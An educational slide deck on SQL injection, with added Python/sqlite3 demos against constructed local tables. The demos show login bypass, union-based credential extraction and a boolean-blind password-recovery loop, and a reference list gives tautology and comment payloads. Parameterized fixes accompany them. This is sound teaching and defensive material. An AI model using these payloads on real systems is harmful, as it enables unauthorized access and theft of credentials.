SQL INJECTION
By: Rayudu babu
School of Cyber Security
International institute of digital technologies
Contents:
What is SQL
What is SQL injection attack
Is SQL injection a serious problem
Types of SQL Injection
Solutions for SQL injection attack
What is SQL:
SQL = Structured Query Language
SQL is the language in which an application talks to a database
 can execute queries against a database
 can retrieve data from a database
 can insert records in a database
 can update records in a database
 can delete records from a database
 can create new databases
 can create new tables in a database
What is SQL injection attack:
It is an injection attack in which the attacker supplies input that the application
concatenates into an SQL statement (query) without proper handling, so that the
attacker's text is executed by the web application's database server as part of the query.
Attackers intent in SQLI:
 Determining the database schema
 Extracting the data
 Adding or modifying the data
 Bypassing the authentication
Pre Learning-Study of SQL Query:
"SELECT * FROM users WHERE username = 'bob' AND password = 'bob123'";
Meaning of special characters in that statement:
* (asterisk) tells the SQL database to return all columns of the matching rows
= (equals) tells the SQL database to return only the rows where the column matches the
compared value
' (single quote mark) tells the SQL database where a string literal starts or ends; this
is the character that matters for injection, because a quote inside user input ends the
string early and whatever follows it is parsed as SQL
Example of SQL injection:
consider the following example in which a website user is able to change the values
of '$user' and '$password', such as in a login form:
$statement = "SELECT * FROM users WHERE username = '$user' AND password=
'$password'";
An attacker can easily insert any special SQL syntax inside the statement, if the input
is not sanitized by the application:
$statement = "SELECT * FROM users WHERE username = 'admin'; -- ' AND
password ='anything'";
Here (admin'; --) is the attacker's input, which contains two new, special characters:
; (semicolon) is used to instruct the SQL parser that the current statement has ended.
-- (double hyphen) instructs the SQL parser that the rest of the line is a comment and
should not be executed
This SQL injection effectively removes the password verification, and returns a
dataset for an existing user – 'admin' in this case. The attacker can now log in with an
administrator account, without having to specify a password.
Caveats: the semicolon is not actually required (admin'-- on its own has the same
effect, and most database drivers refuse a second stacked statement anyway), and in
MySQL the -- comment marker must be followed by a space (or # can be used instead).
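The login bypass above, as an added example that is not part of the original slides: a Python script using the standard-library sqlite3 module against a constructed users table (the schema and sample rows are assumptions for the demo, not the page's own). login_vulnerable builds the SQL text the way the $statement line does; login_safe is the same query with bound parameters. The comment payload is written as admin'-- (the semicolon is not needed), and the tautology payload ' OR '1'='1 from the reference slide is shown as well.

```python
import sqlite3


def make_db():
    """Constructed sample data (assumed schema, not the page's own)."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT)"
    )
    con.executemany(
        "INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
        [("admin", "s3cret", "admin"), ("bob", "bob123", "user")],
    )
    return con


def login_vulnerable(con, user, password):
    """Mirrors the page's $statement: user-controlled values are pasted into the SQL text."""
    sql = (
        "SELECT username, role FROM users "
        f"WHERE username = '{user}' AND password = '{password}'"
    )
    return con.execute(sql).fetchone()


def login_safe(con, user, password):
    """Parameterized query: SQL text and values travel separately, so a quote in the
    input is just data and can never end the string literal early."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return con.execute(sql, (user, password)).fetchone()


def demo():
    """Run the same inputs through both versions and return what each one answers."""
    con = make_db()
    return {
        # normal use: correct credentials
        "legit": login_vulnerable(con, "bob", "bob123"),
        # comment payload: '-- turns the rest of the WHERE clause into a comment
        "bypass_comment": login_vulnerable(con, "admin'-- ", "anything"),
        # tautology payload in the password field: ... AND password = '' OR '1'='1'
        "bypass_tautology": login_vulnerable(con, "x", "' OR '1'='1"),
        # the same payload against the parameterized query finds no such user
        "safe_comment": login_safe(con, "admin'-- ", "anything"),
        # and the parameterized query still works for real credentials
        "safe_legit": login_safe(con, "admin", "s3cret"),
    }


if __name__ == "__main__":
    for name, row in demo().items():
        print(f"{name:18s} -> {row}")
```

The tautology case returns the first row of the table (admin here) because AND binds tighter than OR, so the WHERE clause becomes (username = 'x' AND password = '') OR '1'='1', which is true for every row.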
Is SQL injection a serious problem: yes
The attacker can delete, modify or even steal your data
Compromises the safety, security and trust of user data
Compromises a company's competitiveness or even its ability to stay in business
Types of SQL injection:
 In-band SQLI
 Inferential/blind SQLI
 Out-of-band SQLI
In-band SQL injection:
In-band SQL Injection occurs when an attacker is able to use the same
communication channel to both launch the attack and gather results.
In-band SQLI is of two types:
 Error based SQLI
 Union based SQLI
Error based SQLI:
It is an in-band SQL Injection technique that relies on
error messages thrown by the database server to obtain information
about the structure of the database. It only works when the application shows the
raw database error to the user, which is why database errors should be logged on the
server and replaced by a generic message in the response.
Union-based SQLI:
It is an in-band SQL injection technique that leverages the UNION SQL
operator to combine the results of two or more SELECT statements
into a single result which is then returned as part of the HTTP response.
The injected SELECT must return the same number of columns as the original query,
which the attacker discovers by trial and error.
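Union-based extraction as an added example, not part of the original slides: a Python/sqlite3 product search that pastes the search term into the query and displays the rows it returns (the products and users tables and their rows are constructed for the demo). find_column_count shows the trial-and-error step: every wrong guess makes the database raise an error, which is exactly the signal the error-based section above describes. union_extract_users then pulls username and password pairs out through the two columns of the product listing.

```python
import sqlite3


def make_db():
    """Constructed sample data (assumed schema, not the page's own)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL)")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    con.executemany(
        "INSERT INTO products (name, price) VALUES (?, ?)", [("apple", 1.0), ("pear", 1.5)]
    )
    con.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("admin", "s3cret"), ("bob", "bob123")],
    )
    return con


def search_vulnerable(con, term):
    """Product search that pastes the term into the SQL text and shows every row returned."""
    sql = f"SELECT name, price FROM products WHERE name LIKE '%{term}%'"
    return con.execute(sql).fetchall()


def search_safe(con, term):
    """The same search with the LIKE pattern bound as a parameter."""
    sql = "SELECT name, price FROM products WHERE name LIKE ?"
    return con.execute(sql, (f"%{term}%",)).fetchall()


def find_column_count(con, max_cols=8):
    """Guess how many columns the original SELECT returns.

    UNION needs the same column count on both sides. A wrong guess raises a database
    error (error-based SQLi when the application echoes it); the first guess that does
    not error is the answer. NULL is used because it is compatible with any column type.
    """
    for n in range(1, max_cols + 1):
        nulls = ", ".join(["NULL"] * n)
        try:
            search_vulnerable(con, f"zzz' UNION SELECT {nulls}-- ")
            return n
        except sqlite3.OperationalError:
            continue
    return None


def union_extract_users(con):
    """Return the users table contents as shown through the product listing."""
    # 'zzz' matches no product, so the only rows displayed are the injected SELECT's.
    # The trailing comment marker swallows the closing %' of the original query.
    rows = search_vulnerable(con, "zzz' UNION SELECT username, password FROM users-- ")
    return set(rows)


if __name__ == "__main__":
    db = make_db()
    print("columns:", find_column_count(db))
    print("leaked :", union_extract_users(db))
    print("safe   :", search_safe(db, "zzz' UNION SELECT username, password FROM users-- "))
```

Against search_safe the whole payload is just a search term, so nothing is returned; the vulnerable version shows the credentials in the place where product names and prices normally appear.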
Inferential SQLI /Blind SQLI:
In an inferential SQLI attack, no data is actually transferred via the web
application and the attacker cannot see the result of the injected query in the
application's response (which is why such attacks are commonly referred to as "blind SQL
Injection attacks"). Instead, the attacker reconstructs the database structure and
contents by sending payloads and observing how the web application's response, and
the resulting behaviour of the database server, changes.
Blind SQLI is of two types:
 Boolean-based Blind SQLI
 Time-based Blind SQLI
Boolean-based Blind SQLI
 Attacker sends an SQL query to the database which forces the application to return a
different result depending on whether the query returns a TRUE or FALSE result.
 Depending on the result, the content within the HTTP response will change, or remain the
same. This allows an attacker to infer if the payload used returned true or false, even
though no data from the database is returned.
Time-based Blind SQLI
 The attacker sends an SQL query to the database which forces the database to wait for a
specified amount of time (in seconds) before responding, for example with SLEEP() in
MySQL, pg_sleep() in PostgreSQL or WAITFOR DELAY in Microsoft SQL Server. The response
time will indicate to the attacker whether the result of the query is TRUE or FALSE.
 Depending on the result, an HTTP response will be returned with a delay, or returned
immediately. This allows an attacker to infer if the payload used returned true or false,
even though no data from the database is returned.
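Boolean-based blind extraction as an added example, not part of the original slides: a Python/sqlite3 "does this product exist" check that only ever answers yes or no (the products and users tables and the admin password are constructed for the demo). The attacker turns that one bit into a full read of the admin password by asking, for each character position, whether its code point is above a midpoint, and narrowing down by binary search. The time-based variant is the same loop with a different signal (response delay instead of page content); SQLite has no sleep function, so it is not shown here.

```python
import sqlite3


def make_db():
    """Constructed sample data (assumed schema and secret, not the page's own)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    con.execute("INSERT INTO products (name) VALUES ('apple')")
    con.execute("INSERT INTO users (username, password) VALUES ('admin', 'Zx9!')")
    return con


def product_exists(con, product_id):
    """Vulnerable endpoint: the numeric id is pasted into the query, but the page only
    reveals whether a row came back, never the row itself."""
    sql = f"SELECT 1 FROM products WHERE id = {product_id}"
    return con.execute(sql).fetchone() is not None


def oracle(con, condition):
    """Ask the endpoint a yes/no question: product 1 exists, so the answer is exactly
    the truth value of the injected condition."""
    return product_exists(con, f"1 AND ({condition})")


def extract_password(con, max_len=32):
    """Recover the admin password one character at a time through the boolean oracle."""
    # Step 1: learn the length (one question per candidate length).
    length = 0
    for n in range(1, max_len + 1):
        if oracle(con, f"(SELECT length(password) FROM users WHERE username='admin') = {n}"):
            length = n
            break
    # Step 2: binary-search each character's code point in the printable ASCII range,
    # about seven questions per character instead of up to 95.
    chars = []
    for pos in range(1, length + 1):
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            above = oracle(
                con,
                f"(SELECT unicode(substr(password, {pos}, 1)) "
                f"FROM users WHERE username='admin') > {mid}",
            )
            if above:
                lo = mid + 1
            else:
                hi = mid
        chars.append(chr(lo))
    return "".join(chars)


if __name__ == "__main__":
    db = make_db()
    print("recovered password:", extract_password(db))
```

The defence is the same as for every other variant: bind product_id as a parameter (and, for a numeric id, convert it to int first). Blind injection is slower for the attacker, not safer for the application.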
Out-of-band SQL Injection:
It occurs when an attacker is unable to use the same
channel to launch the attack and gather results, so the results are sent over a
different channel instead. It depends on the database server being able to make
outbound DNS or HTTP requests to a host the attacker controls, and on the attacker
being able to inject a query that triggers such a request.
Solutions for SQL injection:
Input validation (allow-list the expected form and type of every input; a supporting
control, not the primary one)
Prepared statements / parameterized queries (the primary defence: the SQL text and the
user-supplied values are sent to the database separately, so the values can never be
parsed as SQL)
Escaping strings (a last resort where a query cannot be parameterized; error-prone and
database-specific)
Minimize the privileges assigned to every database account in your database
Do not assign DBA or admin type access rights to your application accounts
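Input validation and parameterization side by side, as an added example that is not part of the original slides (Python/sqlite3 with a constructed products table; the column allow-list is an assumption for the demo). It shows the case where parameters alone are not enough: a value such as a price can be bound, but an identifier such as the column in ORDER BY cannot, so it has to be checked against an allow-list before it is spliced into the statement.

```python
import sqlite3

# Allow-list of identifiers that may ever be spliced into SQL text (assumed columns of
# the constructed products table, not the page's schema).
ALLOWED_SORT_COLUMNS = {"name", "price"}


def make_db():
    """Constructed sample data (assumed schema, not the page's own)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL)")
    con.executemany(
        "INSERT INTO products (name, price) VALUES (?, ?)",
        [("pear", 1.5), ("apple", 1.0), ("melon", 3.0)],
    )
    return con


def list_products(con, max_price, sort_by="name"):
    """Return (name, price) rows not above max_price, ordered by an allow-listed column.

    Two different controls are at work:
      * max_price is a value: validate it by converting to the expected type, then bind
        it as a parameter, so its text is never parsed as SQL.
      * sort_by is an identifier: drivers cannot bind identifiers, so it is checked
        against the allow-list before being spliced into the statement.
    """
    price = float(max_price)  # raises ValueError for input such as "1 OR 1=1"
    if sort_by not in ALLOWED_SORT_COLUMNS:
        raise ValueError(f"invalid sort column: {sort_by!r}")
    sql = f"SELECT name, price FROM products WHERE price <= ? ORDER BY {sort_by}"
    return con.execute(sql, (price,)).fetchall()


def demo():
    """One legitimate call and two hostile ones; returns rows, rejections, and whether
    the table survived."""
    con = make_db()
    rows = list_products(con, "1.6", "price")
    rejected = []
    hostile = [
        ("1.6", "name; DROP TABLE products"),  # identifier attack, caught by the allow-list
        ("1 OR 1=1", "name"),                  # value attack, caught by the type check
    ]
    for max_price, sort_by in hostile:
        try:
            list_products(con, max_price, sort_by)
        except ValueError as exc:
            rejected.append(str(exc))
    still_exists = con.execute(
        "SELECT count(*) FROM sqlite_master WHERE type='table' AND name='products'"
    ).fetchone()[0] == 1
    return rows, rejected, still_exists


if __name__ == "__main__":
    rows, rejected, ok = demo()
    print("rows:", rows)
    print("rejected:", rejected)
    print("products table intact:", ok)
```

The least-privilege items on the slide complement this: even if a query slips through, an application account without DROP or write rights on tables it only reads limits what an injected statement can do.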
Note:
http://bobby-tables.com/
Bobby Tables: A guide to preventing SQL injection
Reference:
Comment and termination sequences used to control the rest of the SQL query, by database:
-- MySQL, MSSQL, Oracle, PostgreSQL, SQLite
' OR '1'='1' --
' OR '1'='1' /*
-- MySQL
' OR '1'='1' #
-- Access (using null characters)
' OR '1'='1' %00
' OR '1'='1' %16
 https://www.owasp.org/index.php/SQL_Injection
 https://www.nds.rub.de/media/hfs/attachments/files/2010/03/hackpra09_kornburst_advanced_sql_injection.pdf
 https://www.acunetix.com/websitesecurity/sql-injection/
 http://bobby-tables.com/
 https://www.netsparker.com/blog/web-security/sql-injection-vulnerability/
 https://www.youtube.com/watch?v=PB7hWlqTSqs
 http://securityidiots.com/Web-Pentest/SQL-Injection/Part-2-Basic-of-SQL-for-SQLi.html
 https://gbhackers.com/manual-sql-injection/
THANK YOU
